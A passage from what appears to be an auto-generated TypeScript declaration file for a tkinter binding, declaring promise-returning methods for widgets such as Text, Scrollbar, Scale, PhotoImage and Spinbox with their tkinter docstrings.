identified by INDEX.\n\t\t */\n\t\tindex(index): Promise<any>\n\t\tindex$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Invoke a menu item identified by INDEX and execute\n\t\t * the associated command.\n\t\t */\n\t\tinvoke(index): Promise<any>\n\t\tinvoke$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Display a menu at position X,Y.\n\t\t */\n\t\tpost(x, y): Promise<any>\n\t\tpost$({ x, y }): Promise<any>\n\n\t\t/**\n\t\t * Return the type of the menu item at INDEX.\n\t\t */\n\t\ttype(index): Promise<any>\n\t\ttype$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Unmap a menu.\n\t\t */\n\t\tunpost(): Promise<any>\n\t\tunpost$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the x-position of the leftmost pixel of the menu item\n\t\t * at INDEX.\n\t\t */\n\t\txposition(index): Promise<any>\n\t\txposition$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Return the y-position of the topmost pixel of the menu item at INDEX.\n\t\t */\n\t\typosition(index): Promise<any>\n\t\typosition$({ index }): Promise<any>\n\t\tentryconfig\n\t}\n\n\t/**\n\t * Menubutton widget, obsolete since Tk8.0.\n\t */\n\tfunction Menubutton(master?, cnf?): Promise<IMenubutton>\n\tfunction Menubutton$({ master, cnf }: { master?, cnf?}): Promise<IMenubutton>\n\tinterface IMenubutton extends IWidget {\n\t}\n\n\t/**\n\t * Message widget to display multiline text. Obsolete since Label does it too.\n\t */\n\tfunction Message(master?, cnf?): Promise<IMessage>\n\tfunction Message$({ master, cnf }: { master?, cnf?}): Promise<IMessage>\n\tinterface IMessage extends IWidget {\n\t}\n\n\t/**\n\t * Radiobutton widget which shows only one of several buttons in on-state.\n\t */\n\n\t/**\n\t * Construct a radiobutton widget with the parent MASTER.\n\t * \n\t * Valid resource names: activebackground, activeforeground, anchor,\n\t * background, bd, bg, bitmap, borderwidth, command, cursor,\n\t * disabledforeground, fg, font, foreground, height,\n\t * highlightbackground, highlightcolor, highlightthickness, image,\n\t * indicatoron, justify, padx, pady, relief, selectcolor, selectimage,\n\t * state, takefocus, text, textvariable, underline, value, variable,\n\t * width, wraplength.\n\t */\n\tfunction Radiobutton(master?, cnf?): Promise<IRadiobutton>\n\tfunction Radiobutton$({ master, cnf }: { master?, cnf?}): Promise<IRadiobutton>\n\tinterface IRadiobutton extends IWidget {\n\n\t\t/**\n\t\t * Put the button in off-state.\n\t\t */\n\t\tdeselect(): Promise<any>\n\t\tdeselect$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Flash the button.\n\t\t */\n\t\tflash(): Promise<any>\n\t\tflash$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Toggle the button and invoke a command if given as resource.\n\t\t */\n\t\tinvoke(): Promise<any>\n\t\tinvoke$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Put the button in on-state.\n\t\t */\n\t\tselect(): Promise<any>\n\t\tselect$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * Scale widget which can display a numerical scale.\n\t */\n\n\t/**\n\t * Construct a scale widget with the parent MASTER.\n\t * \n\t * Valid resource names: activebackground, background, bigincrement, bd,\n\t * bg, borderwidth, command, cursor, digits, fg, font, foreground, from,\n\t * highlightbackground, highlightcolor, highlightthickness, label,\n\t * length, orient, relief, repeatdelay, repeatinterval, resolution,\n\t * showvalue, sliderlength, sliderrelief, state, takefocus,\n\t * tickinterval, to, troughcolor, variable, width.\n\t */\n\tfunction Scale(master?, cnf?): Promise<IScale>\n\tfunction Scale$({ master, cnf }: { master?, cnf?}): Promise<IScale>\n\tinterface IScale extends IWidget {\n\n\t\t/**\n\t\t * Get the current value as integer or float.\n\t\t */\n\t\tget(): Promise<any>\n\t\tget$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set the value to VALUE.\n\t\t */\n\t\tset(value): Promise<any>\n\t\tset$({ value }): Promise<any>\n\n\t\t/**\n\t\t * Return a tuple (X,Y) of the point along the centerline of the\n\t\t * trough that corresponds to VALUE or the current value if None is\n\t\t * given.\n\t\t */\n\t\tcoords(value?): Promise<any>\n\t\tcoords$({ value }: { value?}): Promise<any>\n\n\t\t/**\n\t\t * Return where the point X,Y lies. Valid return values are \"slider\",\n\t\t * \"though1\" and \"though2\".\n\t\t */\n\t\tidentify(x, y): Promise<any>\n\t\tidentify$({ x, y }): Promise<any>\n\t}\n\n\t/**\n\t * Scrollbar widget which displays a slider at a certain position.\n\t */\n\n\t/**\n\t * Construct a scrollbar widget with the parent MASTER.\n\t * \n\t * Valid resource names: activebackground, activerelief,\n\t * background, bd, bg, borderwidth, command, cursor,\n\t * elementborderwidth, highlightbackground,\n\t * highlightcolor, highlightthickness, jump, orient,\n\t * relief, repeatdelay, repeatinterval, takefocus,\n\t * troughcolor, width.\n\t */\n\tfunction Scrollbar(master?, cnf?): Promise<IScrollbar>\n\tfunction Scrollbar$({ master, cnf }: { master?, cnf?}): Promise<IScrollbar>\n\tinterface IScrollbar extends IWidget {\n\n\t\t/**\n\t\t * Marks the element indicated by index as active.\n\t\t * The only index values understood by this method are \"arrow1\",\n\t\t * \"slider\", or \"arrow2\". If any other value is specified then no\n\t\t * element of the scrollbar will be active. If index is not specified,\n\t\t * the method returns the name of the element that is currently active,\n\t\t * or None if no element is active.\n\t\t */\n\t\tactivate(index?): Promise<any>\n\t\tactivate$({ index }: { index?}): Promise<any>\n\n\t\t/**\n\t\t * Return the fractional change of the scrollbar setting if it\n\t\t * would be moved by DELTAX or DELTAY pixels.\n\t\t */\n\t\tdelta(deltax, deltay): Promise<any>\n\t\tdelta$({ deltax, deltay }): Promise<any>\n\n\t\t/**\n\t\t * Return the fractional value which corresponds to a slider\n\t\t * position of X,Y.\n\t\t */\n\t\tfraction(x, y): Promise<any>\n\t\tfraction$({ x, y }): Promise<any>\n\n\t\t/**\n\t\t * Return the element under position X,Y as one of\n\t\t * \"arrow1\",\"slider\",\"arrow2\" or \"\".\n\t\t */\n\t\tidentify(x, y): Promise<any>\n\t\tidentify$({ x, y }): Promise<any>\n\n\t\t/**\n\t\t * Return the current fractional values (upper and lower end)\n\t\t * of the slider position.\n\t\t */\n\t\tget(): Promise<any>\n\t\tget$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set the fractional values of the slider position (upper and\n\t\t * lower ends as value between 0 and 1).\n\t\t */\n\t\tset(first, last): Promise<any>\n\t\tset$({ first, last }): Promise<any>\n\t}\n\n\t/**\n\t * Text widget which can display text in various forms.\n\t */\n\n\t/**\n\t * Construct a text widget with the parent MASTER.\n\t * \n\t * STANDARD OPTIONS\n\t * \n\t * background, borderwidth, cursor,\n\t * exportselection, font, foreground,\n\t * highlightbackground, highlightcolor,\n\t * highlightthickness, insertbackground,\n\t * insertborderwidth, insertofftime,\n\t * insertontime, insertwidth, padx, pady,\n\t * relief, selectbackground,\n\t * selectborderwidth, selectforeground,\n\t * setgrid, takefocus,\n\t * xscrollcommand, yscrollcommand,\n\t * \n\t * WIDGET-SPECIFIC OPTIONS\n\t * \n\t * autoseparators, height, maxundo,\n\t * spacing1, spacing2, spacing3,\n\t * state, tabs, undo, width, wrap,\n\t * \n\t * \n\t */\n\tfunction Text(master?, cnf?): Promise<IText>\n\tfunction Text$({ master, cnf }: { master?, cnf?}): Promise<IText>\n\tinterface IText extends IWidget, IXView, IYView {\n\n\t\t/**\n\t\t * Return a tuple of (x,y,width,height) which gives the bounding\n\t\t * box of the visible part of the character at the given index.\n\t\t */\n\t\tbbox(index): Promise<any>\n\t\tbbox$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Return whether between index INDEX1 and index INDEX2 the\n\t\t * relation OP is satisfied. OP is one of <, <=, ==, >=, >, or !=.\n\t\t */\n\t\tcompare(index1, op, index2): Promise<any>\n\t\tcompare$({ index1, op, index2 }): Promise<any>\n\n\t\t/**\n\t\t * Counts the number of relevant things between the two indices.\n\t\t * If index1 is after index2, the result will be a negative number\n\t\t * (and this holds for each of the possible options).\n\t\t * \n\t\t * The actual items which are counted depends on the options given by\n\t\t * args. The result is a list of integers, one for the result of each\n\t\t * counting option given. Valid counting options are \"chars\",\n\t\t * \"displaychars\", \"displayindices\", \"displaylines\", \"indices\",\n\t\t * \"lines\", \"xpixels\" and \"ypixels\". There is an additional possible\n\t\t * option \"update\", which if given then all subsequent options ensure\n\t\t * that any possible out of date information is recalculated.\n\t\t */\n\t\tcount(index1, index2): Promise<any>\n\t\tcount$({ index1, index2 }): Promise<any>\n\n\t\t/**\n\t\t * Turn on the internal consistency checks of the B-Tree inside the text\n\t\t * widget according to BOOLEAN.\n\t\t */\n\t\tdebug(boolean?): Promise<any>\n\t\tdebug$({ boolean }: { boolean?}): Promise<any>\n\n\t\t/**\n\t\t * Delete the characters between INDEX1 and INDEX2 (not included).\n\t\t */\n\t\tdelete(index1, index2?): Promise<any>\n\t\tdelete$({ index1, index2 }: { index1, index2?}): Promise<any>\n\n\t\t/**\n\t\t * Return tuple (x,y,width,height,baseline) giving the bounding box\n\t\t * and baseline position of the visible part of the line containing\n\t\t * the character at INDEX.\n\t\t */\n\t\tdlineinfo(index): Promise<any>\n\t\tdlineinfo$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Return the contents of the widget between index1 and index2.\n\t\t * \n\t\t * The type of contents returned in filtered based on the keyword\n\t\t * parameters; if 'all', 'image', 'mark', 'tag', 'text', or 'window' are\n\t\t * given and true, then the corresponding items are returned. The result\n\t\t * is a list of triples of the form (key, value, index). If none of the\n\t\t * keywords are true then 'all' is used by default.\n\t\t * \n\t\t * If the 'command' argument is given, it is called once for each element\n\t\t * of the list of triples, with the values of each triple serving as the\n\t\t * arguments to the function. In this case the list is not returned.\n\t\t */\n\t\tdump(index1, index2?, command?): Promise<any>\n\t\tdump$({ index1, index2, command }: { index1, index2?, command?}): Promise<any>\n\n\t\t/**\n\t\t * Internal method\n\t\t * \n\t\t * This method controls the undo mechanism and\n\t\t * the modified flag. The exact behavior of the\n\t\t * command depends on the option argument that\n\t\t * follows the edit argument. The following forms\n\t\t * of the command are currently supported:\n\t\t * \n\t\t * edit_modified, edit_redo, edit_reset, edit_separator\n\t\t * and edit_undo\n\t\t * \n\t\t * \n\t\t */\n\t\tedit(): Promise<any>\n\t\tedit$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Get or Set the modified flag\n\t\t * \n\t\t * If arg is not specified, returns the modified\n\t\t * flag of the widget. The insert, delete, edit undo and\n\t\t * edit redo commands or the user can set or clear the\n\t\t * modified flag. If boolean is specified, sets the\n\t\t * modified flag of the widget to arg.\n\t\t * \n\t\t */\n\t\tedit_modified(arg?): Promise<any>\n\t\tedit_modified$({ arg }: { arg?}): Promise<any>\n\n\t\t/**\n\t\t * Redo the last undone edit\n\t\t * \n\t\t * When the undo option is true, reapplies the last\n\t\t * undone edits provided no other edits were done since\n\t\t * then. Generates an error when the redo stack is empty.\n\t\t * Does nothing when the undo option is false.\n\t\t * \n\t\t */\n\t\tedit_redo(): Promise<any>\n\t\tedit_redo$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Clears the undo and redo stacks\n\t\t * \n\t\t */\n\t\tedit_reset(): Promise<any>\n\t\tedit_reset$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Inserts a separator (boundary) on the undo stack.\n\t\t * \n\t\t * Does nothing when the undo option is false\n\t\t * \n\t\t */\n\t\tedit_separator(): Promise<any>\n\t\tedit_separator$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Undoes the last edit action\n\t\t * \n\t\t * If the undo option is true. An edit action is defined\n\t\t * as all the insert and delete commands that are recorded\n\t\t * on the undo stack in between two separators. Generates\n\t\t * an error when the undo stack is empty. Does nothing\n\t\t * when the undo option is false\n\t\t * \n\t\t */\n\t\tedit_undo(): Promise<any>\n\t\tedit_undo$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the text from INDEX1 to INDEX2 (not included).\n\t\t */\n\t\tget(index1, index2?): Promise<any>\n\t\tget$({ index1, index2 }: { index1, index2?}): Promise<any>\n\n\t\t/**\n\t\t * Return the value of OPTION of an embedded image at INDEX.\n\t\t */\n\t\timage_cget(index, option): Promise<any>\n\t\timage_cget$({ index, option }): Promise<any>\n\n\t\t/**\n\t\t * Configure an embedded image at INDEX.\n\t\t */\n\t\timage_configure(index, cnf?): Promise<any>\n\t\timage_configure$({ index, cnf }: { index, cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Create an embedded image at INDEX.\n\t\t */\n\t\timage_create(index, cnf?): Promise<any>\n\t\timage_create$({ index, cnf }: { index, cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Return all names of embedded images in this widget.\n\t\t */\n\t\timage_names(): Promise<any>\n\t\timage_names$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the index in the form line.char for INDEX.\n\t\t */\n\t\tindex(index): Promise<any>\n\t\tindex$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Insert CHARS before the characters at INDEX. An additional\n\t\t * tag can be given in ARGS. Additional CHARS and tags can follow in ARGS.\n\t\t */\n\t\tinsert(index, chars): Promise<any>\n\t\tinsert$({ index, chars }): Promise<any>\n\n\t\t/**\n\t\t * Change the gravity of a mark MARKNAME to DIRECTION (LEFT or RIGHT).\n\t\t * Return the current value if None is given for DIRECTION.\n\t\t */\n\t\tmark_gravity(markName, direction?): Promise<any>\n\t\tmark_gravity$({ markName, direction }: { markName, direction?}): Promise<any>\n\n\t\t/**\n\t\t * Return all mark names.\n\t\t */\n\t\tmark_names(): Promise<any>\n\t\tmark_names$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set mark MARKNAME before the character at INDEX.\n\t\t */\n\t\tmark_set(markName, index): Promise<any>\n\t\tmark_set$({ markName, index }): Promise<any>\n\n\t\t/**\n\t\t * Delete all marks in MARKNAMES.\n\t\t */\n\t\tmark_unset(): Promise<any>\n\t\tmark_unset$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the name of the next mark after INDEX.\n\t\t */\n\t\tmark_next(index): Promise<any>\n\t\tmark_next$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Return the name of the previous mark before INDEX.\n\t\t */\n\t\tmark_previous(index): Promise<any>\n\t\tmark_previous$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Creates a peer text widget with the given newPathName, and any\n\t\t * optional standard configuration options. By default the peer will\n\t\t * have the same start and end line as the parent widget, but\n\t\t * these can be overridden with the standard configuration options.\n\t\t */\n\t\tpeer_create(newPathName, cnf?): Promise<any>\n\t\tpeer_create$({ newPathName, cnf }: { newPathName, cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Returns a list of peers of this widget (this does not include\n\t\t * the widget itself).\n\t\t */\n\t\tpeer_names(): Promise<any>\n\t\tpeer_names$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Replaces the range of characters between index1 and index2 with\n\t\t * the given characters and tags specified by args.\n\t\t * \n\t\t * See the method insert for some more information about args, and the\n\t\t * method delete for information about the indices.\n\t\t */\n\t\treplace(index1, index2, chars): Promise<any>\n\t\treplace$({ index1, index2, chars }): Promise<any>\n\n\t\t/**\n\t\t * Remember the current X, Y coordinates.\n\t\t */\n\t\tscan_mark(x, y): Promise<any>\n\t\tscan_mark$({ x, y }): Promise<any>\n\n\t\t/**\n\t\t * Adjust the view of the text to 10 times the\n\t\t * difference between X and Y and the coordinates given in\n\t\t * scan_mark.\n\t\t */\n\t\tscan_dragto(x, y): Promise<any>\n\t\tscan_dragto$({ x, y }): Promise<any>\n\n\t\t/**\n\t\t * Search PATTERN beginning from INDEX until STOPINDEX.\n\t\t * Return the index of the first character of a match or an\n\t\t * empty string.\n\t\t */\n\t\tsearch(pattern, index, stopindex?, forwards?, backwards?, exact?, regexp?, nocase?, count?, elide?): Promise<any>\n\t\tsearch$({ pattern, index, stopindex, forwards, backwards, exact, regexp, nocase, count, elide }: { pattern, index, stopindex?, forwards?, backwards?, exact?, regexp?, nocase?, count?, elide?}): Promise<any>\n\n\t\t/**\n\t\t * Scroll such that the character at INDEX is visible.\n\t\t */\n\t\tsee(index): Promise<any>\n\t\tsee$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Add tag TAGNAME to all characters between INDEX1 and index2 in ARGS.\n\t\t * Additional pairs of indices may follow in ARGS.\n\t\t */\n\t\ttag_add(tagName, index1): Promise<any>\n\t\ttag_add$({ tagName, index1 }): Promise<any>\n\n\t\t/**\n\t\t * Unbind for all characters with TAGNAME for event SEQUENCE the\n\t\t * function identified with FUNCID.\n\t\t */\n\t\ttag_unbind(tagName, sequence, funcid?): Promise<any>\n\t\ttag_unbind$({ tagName, sequence, funcid }: { tagName, sequence, funcid?}): Promise<any>\n\n\t\t/**\n\t\t * Bind to all characters with TAGNAME at event SEQUENCE a call to function FUNC.\n\t\t * \n\t\t * An additional boolean parameter ADD specifies whether FUNC will be\n\t\t * called additionally to the other bound function or whether it will\n\t\t * replace the previous function. See bind for the return value.\n\t\t */\n\t\ttag_bind(tagName, sequence, func, add?): Promise<any>\n\t\ttag_bind$({ tagName, sequence, func, add }: { tagName, sequence, func, add?}): Promise<any>\n\n\t\t/**\n\t\t * Return the value of OPTION for tag TAGNAME.\n\t\t */\n\t\ttag_cget(tagName, option): Promise<any>\n\t\ttag_cget$({ tagName, option }): Promise<any>\n\n\t\t/**\n\t\t * Configure a tag TAGNAME.\n\t\t */\n\t\ttag_configure(tagName, cnf?): Promise<any>\n\t\ttag_configure$({ tagName, cnf }: { tagName, cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Delete all tags in TAGNAMES.\n\t\t */\n\t\ttag_delete(): Promise<any>\n\t\ttag_delete$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Change the priority of tag TAGNAME such that it is lower\n\t\t * than the priority of BELOWTHIS.\n\t\t */\n\t\ttag_lower(tagName, belowThis?): Promise<any>\n\t\ttag_lower$({ tagName, belowThis }: { tagName, belowThis?}): Promise<any>\n\n\t\t/**\n\t\t * Return a list of all tag names.\n\t\t */\n\t\ttag_names(index?): Promise<any>\n\t\ttag_names$({ index }: { index?}): Promise<any>\n\n\t\t/**\n\t\t * Return a list of start and end index for the first sequence of\n\t\t * characters between INDEX1 and INDEX2 which all have tag TAGNAME.\n\t\t * The text is searched forward from INDEX1.\n\t\t */\n\t\ttag_nextrange(tagName, index1, index2?): Promise<any>\n\t\ttag_nextrange$({ tagName, index1, index2 }: { tagName, index1, index2?}): Promise<any>\n\n\t\t/**\n\t\t * Return a list of start and end index for the first sequence of\n\t\t * characters between INDEX1 and INDEX2 which all have tag TAGNAME.\n\t\t * The text is searched backwards from INDEX1.\n\t\t */\n\t\ttag_prevrange(tagName, index1, index2?): Promise<any>\n\t\ttag_prevrange$({ tagName, index1, index2 }: { tagName, index1, index2?}): Promise<any>\n\n\t\t/**\n\t\t * Change the priority of tag TAGNAME such that it is higher\n\t\t * than the priority of ABOVETHIS.\n\t\t */\n\t\ttag_raise(tagName, aboveThis?): Promise<any>\n\t\ttag_raise$({ tagName, aboveThis }: { tagName, aboveThis?}): Promise<any>\n\n\t\t/**\n\t\t * Return a list of ranges of text which have tag TAGNAME.\n\t\t */\n\t\ttag_ranges(tagName): Promise<any>\n\t\ttag_ranges$({ tagName }): Promise<any>\n\n\t\t/**\n\t\t * Remove tag TAGNAME from all characters between INDEX1 and INDEX2.\n\t\t */\n\t\ttag_remove(tagName, index1, index2?): Promise<any>\n\t\ttag_remove$({ tagName, index1, index2 }: { tagName, index1, index2?}): Promise<any>\n\n\t\t/**\n\t\t * Return the value of OPTION of an embedded window at INDEX.\n\t\t */\n\t\twindow_cget(index, option): Promise<any>\n\t\twindow_cget$({ index, option }): Promise<any>\n\n\t\t/**\n\t\t * Configure an embedded window at INDEX.\n\t\t */\n\t\twindow_configure(index, cnf?): Promise<any>\n\t\twindow_configure$({ index, cnf }: { index, cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Create a window at INDEX.\n\t\t */\n\t\twindow_create(index, cnf?): Promise<any>\n\t\twindow_create$({ index, cnf }: { index, cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Return all names of embedded windows in this widget.\n\t\t */\n\t\twindow_names(): Promise<any>\n\t\twindow_names$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Obsolete function, use see.\n\t\t */\n\t\tyview_pickplace(): Promise<any>\n\t\tyview_pickplace$($: {}): Promise<any>\n\t\ttag_config\n\t\twindow_config\n\t}\n\n\t/**\n\t * Internal class. It wraps the command in the widget OptionMenu.\n\t */\n\tinterface I_setit {\n\t}\n\n\t/**\n\t * OptionMenu which allows the user to select a value from a menu.\n\t */\n\n\t/**\n\t * Construct an optionmenu widget with the parent MASTER, with\n\t * the resource textvariable set to VARIABLE, the initially selected\n\t * value VALUE, the other menu values VALUES and an additional\n\t * keyword argument command.\n\t */\n\tfunction OptionMenu(master, variable, value): Promise<IOptionMenu>\n\tfunction OptionMenu$({ master, variable, value }): Promise<IOptionMenu>\n\tinterface IOptionMenu extends IMenubutton {\n\n\t\t/**\n\t\t * Destroy this widget and the associated menu.\n\t\t */\n\t\tdestroy(): Promise<any>\n\t\tdestroy$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * Base class for images.\n\t */\n\tfunction Image(imgtype, name?, cnf?, master?): Promise<IImage>\n\tfunction Image$({ imgtype, name, cnf, master }: { imgtype, name?, cnf?, master?}): Promise<IImage>\n\tinterface IImage {\n\n\t\t/**\n\t\t * Configure the image.\n\t\t */\n\t\tconfigure(): Promise<any>\n\t\tconfigure$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the height of the image.\n\t\t */\n\t\theight(): Promise<any>\n\t\theight$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the type of the image, e.g. \"photo\" or \"bitmap\".\n\t\t */\n\t\ttype(): Promise<any>\n\t\ttype$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the width of the image.\n\t\t */\n\t\twidth(): Promise<any>\n\t\twidth$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * Widget which can display images in PGM, PPM, GIF, PNG format.\n\t */\n\n\t/**\n\t * Create an image with NAME.\n\t * \n\t * Valid resource names: data, format, file, gamma, height, palette,\n\t * width.\n\t */\n\tfunction PhotoImage(name?, cnf?, master?): Promise<IPhotoImage>\n\tfunction PhotoImage$({ name, cnf, master }: { name?, cnf?, master?}): Promise<IPhotoImage>\n\tinterface IPhotoImage extends IImage {\n\n\t\t/**\n\t\t * Display a transparent image.\n\t\t */\n\t\tblank(): Promise<any>\n\t\tblank$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the value of OPTION.\n\t\t */\n\t\tcget(option): Promise<any>\n\t\tcget$({ option }): Promise<any>\n\n\t\t/**\n\t\t * Return a new PhotoImage with the same image as this widget.\n\t\t */\n\t\tcopy(): Promise<any>\n\t\tcopy$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return a new PhotoImage with the same image as this widget\n\t\t * but zoom it with a factor of x in the X direction and y in the Y\n\t\t * direction. If y is not given, the default value is the same as x.\n\t\t * \n\t\t */\n\t\tzoom(x, y?): Promise<any>\n\t\tzoom$({ x, y }: { x, y?}): Promise<any>\n\n\t\t/**\n\t\t * Return a new PhotoImage based on the same image as this widget\n\t\t * but use only every Xth or Yth pixel. If y is not given, the\n\t\t * default value is the same as x.\n\t\t * \n\t\t */\n\t\tsubsample(x, y?): Promise<any>\n\t\tsubsample$({ x, y }: { x, y?}): Promise<any>\n\n\t\t/**\n\t\t * Return the color (red, green, blue) of the pixel at X,Y.\n\t\t */\n\t\tget(x, y): Promise<any>\n\t\tget$({ x, y }): Promise<any>\n\n\t\t/**\n\t\t * Put row formatted colors to image starting from\n\t\t * position TO, e.g. image.put(\"{red green} {blue yellow}\", to=(4,6))\n\t\t */\n\t\tput(data, to?): Promise<any>\n\t\tput$({ data, to }: { data, to?}): Promise<any>\n\n\t\t/**\n\t\t * Write image to file FILENAME in FORMAT starting from\n\t\t * position FROM_COORDS.\n\t\t */\n\t\twrite(filename, format?, from_coords?): Promise<any>\n\t\twrite$({ filename, format, from_coords }: { filename, format?, from_coords?}): Promise<any>\n\n\t\t/**\n\t\t * Return True if the pixel at x,y is transparent.\n\t\t */\n\t\ttransparency_get(x, y): Promise<any>\n\t\ttransparency_get$({ x, y }): Promise<any>\n\n\t\t/**\n\t\t * Set the transparency of the pixel at x,y.\n\t\t */\n\t\ttransparency_set(x, y, boolean): Promise<any>\n\t\ttransparency_set$({ x, y, boolean }): Promise<any>\n\t}\n\n\t/**\n\t * Widget which can display images in XBM format.\n\t */\n\n\t/**\n\t * Create a bitmap with NAME.\n\t * \n\t * Valid resource names: background, data, file, foreground, maskdata, maskfile.\n\t */\n\tfunction BitmapImage(name?, cnf?, master?): Promise<IBitmapImage>\n\tfunction BitmapImage$({ name, cnf, master }: { name?, cnf?, master?}): Promise<IBitmapImage>\n\tinterface IBitmapImage extends IImage {\n\t}\n\n\t/**\n\t * spinbox widget.\n\t */\n\n\t/**\n\t * Construct a spinbox widget with the parent MASTER.\n\t * \n\t * STANDARD OPTIONS\n\t * \n\t * activebackground, background, borderwidth,\n\t * cursor, exportselection, font, foreground,\n\t * highlightbackground, highlightcolor,\n\t * highlightthickness, insertbackground,\n\t * insertborderwidth, insertofftime,\n\t * insertontime, insertwidth, justify, relief,\n\t * repeatdelay, repeatinterval,\n\t * selectbackground, selectborderwidth\n\t * selectforeground, takefocus, textvariable\n\t * xscrollcommand.\n\t * \n\t * WIDGET-SPECIFIC OPTIONS\n\t * \n\t * buttonbackground, buttoncursor,\n\t * buttondownrelief, buttonuprelief,\n\t * command, disabledbackground,\n\t * disabledforeground, format, from,\n\t * invalidcommand, increment,\n\t * readonlybackground, state, to,\n\t * validate, validatecommand values,\n\t * width, wrap,\n\t * \n\t */\n\tfunction Spinbox(master?, cnf?): Promise<ISpinbox>\n\tfunction Spinbox$({ master, cnf }: { master?, cnf?}): Promise<ISpinbox>\n\tinterface ISpinbox extends IWidget, IXView {\n\n\t\t/**\n\t\t * Return a tuple of X1,Y1,X2,Y2 coordinates for a\n\t\t * rectangle which encloses the character given by index.\n\t\t * \n\t\t * The first two elements of the list give the x and y\n\t\t * coordinates of the upper-left corner of the screen\n\t\t * area covered by the character (in pixels relative\n\t\t * to the widget) and the last two elements give the\n\t\t * width and height of the character, in pixels. The\n\t\t * bounding box may refer to a region outside the\n\t\t * visible area of the window.\n\t\t * \n\t\t */\n\t\tbbox(index): Promise<any>\n\t\tbbox$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Delete one or more elements of the spinbox.\n\t\t * \n\t\t * First is the index of the first character to delete,\n\t\t * and last is the index of the character just after\n\t\t * the last one to delete. If last isn't specified it\n\t\t * defaults to first+1, i.e. a single character is\n\t\t * deleted. This command returns an empty string.\n\t\t * \n\t\t */\n\t\tdelete(first, last?): Promise<any>\n\t\tdelete$({ first, last }: { first, last?}): Promise<any>\n\n\t\t/**\n\t\t * Returns the spinbox's string\n\t\t */\n\t\tget(): Promise<any>\n\t\tget$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Alter the position of the insertion cursor.\n\t\t * \n\t\t * The insertion cursor will be displayed just before\n\t\t * the character given by index. Returns an empty string\n\t\t * \n\t\t */\n\t\ticursor(index): Promise<any>\n\t\ticursor$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Returns the name of the widget at position x, y\n\t\t * \n\t\t * Return value is one of: none, buttondown, buttonup, entry\n\t\t * \n\t\t */\n\t\tidentify(x, y): Promise<any>\n\t\tidentify$({ x, y }): Promise<any>\n\n\t\t/**\n\t\t * Returns the numerical index corresponding to index\n\t\t * \n\t\t */\n\t\tindex(index): Promise<any>\n\t\tindex$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Insert string s at index\n\t\t * \n\t\t * Returns an empty string.\n\t\t * \n\t\t */\n\t\tinsert(index, s): Promise<any>\n\t\tinsert$({ index, s }): Promise<any>\n\n\t\t/**\n\t\t * Causes the specified element to be invoked\n\t\t * \n\t\t * The element could be buttondown or buttonup\n\t\t * triggering the action associated with it.\n\t\t * \n\t\t */\n\t\tinvoke(element): Promise<any>\n\t\tinvoke$({ element }): Promise<any>\n\n\t\t/**\n\t\t * Internal function.\n\t\t */\n\t\tscan(): Promise<any>\n\t\tscan$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Records x and the current view in the spinbox window;\n\t\t * \n\t\t * used in conjunction with later scan dragto commands.\n\t\t * Typically this command is associated with a mouse button\n\t\t * press in the widget. It returns an empty string.\n\t\t * \n\t\t */\n\t\tscan_mark(x): Promise<any>\n\t\tscan_mark$({ x }): Promise<any>\n\n\t\t/**\n\t\t * Compute the difference between the given x argument\n\t\t * and the x argument to the last scan mark command\n\t\t * \n\t\t * It then adjusts the view left or right by 10 times the\n\t\t * difference in x-coordinates. This command is typically\n\t\t * associated with mouse motion events in the widget, to\n\t\t * produce the effect of dragging the spinbox at high speed\n\t\t * through the window. The return value is an empty string.\n\t\t * \n\t\t */\n\t\tscan_dragto(x): Promise<any>\n\t\tscan_dragto$({ x }): Promise<any>\n\n\t\t/**\n\t\t * Internal function.\n\t\t */\n\t\tselection(): Promise<any>\n\t\tselection$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Locate the end of the selection nearest to the character\n\t\t * given by index,\n\t\t * \n\t\t * Then adjust that end of the selection to be at index\n\t\t * (i.e including but not going beyond index). The other\n\t\t * end of the selection is made the anchor point for future\n\t\t * select to commands. If the selection isn't currently in\n\t\t * the spinbox, then a new selection is created to include\n\t\t * the characters between index and the most recent selection\n\t\t * anchor point, inclusive.\n\t\t * \n\t\t */\n\t\tselection_adjust(index): Promise<any>\n\t\tselection_adjust$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Clear the selection\n\t\t 